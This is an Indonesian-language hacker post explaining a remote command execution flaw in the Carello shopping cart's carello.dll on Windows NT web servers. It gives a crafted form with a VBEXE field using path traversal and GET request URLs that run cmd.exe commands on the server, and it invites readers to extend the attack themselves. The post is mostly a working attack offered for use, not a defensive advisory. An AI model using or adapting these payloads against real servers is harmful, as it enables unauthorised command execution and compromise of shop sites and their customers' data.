Exsploitasi Troli Belanja Carello

Sudahkan pernah mendengar tentang troli belanja cart32 yang heboh dengan pencurian karu kreditnya ? selain itu ada lagi troli belanja Hasan Consulting, troli belanja DCShop dan troli belanja Carello

Nah di sini gw cuma mo ngebahas sedikit tentang troli belanja carello. Untuk mengembangkannya itu tugas lo semua.

Troli belanja carello yang berjalan pada windows NT punya kecacatan yang memperoleh eksekusi perintah jarak jauh melalui HTTP. Troli ini memiliki komponen bernama carello.dll yang berinteraksi dengan klien. Penyerang bisa memasukkan perintah-perintah dengan menggunakan form URL yang salah sehingga memperbolehkan pengeksekusian perintah remote pada webserver

form method="POST" action= "http:///scripts/Carello/Carello.dll"
input type="hidden" name="CARELLOCODE" value="WESTPOINT"
input type="hidden" name="VBEXE" value= "c:\inetpub\..carello-exe-file"
input type=....etc etc

c:\..\..\..\..\..\..\..\.\winnt\notepad.exe
penyerang dapat mengeksekusi dan memanipulasi HTML

anda juga pade bisa make GET request dengan menggunakan parameter VBEXE

/scripts/Carello/Carello.dll?VBEXE=c:\.\winnt\system32\cmd.exe%20/c%20dir >c:\dir.txt


Misalnya url berikut ini bisa mengeksekusi perintah dir pada server :

HTTP:///scripts/carello/carello.dll?CARELLOCODE=SITE2&VBEXEC=C:\..winnt\system32\cmd.exe%20/c%20dir


Nah itu aja buat lebih jelasnya lo pade lah yang berkreatif ria. selamat mengembangkan.



thank's to : empty
dan semuanya di #salatigahackerlink

http://www.bozz.com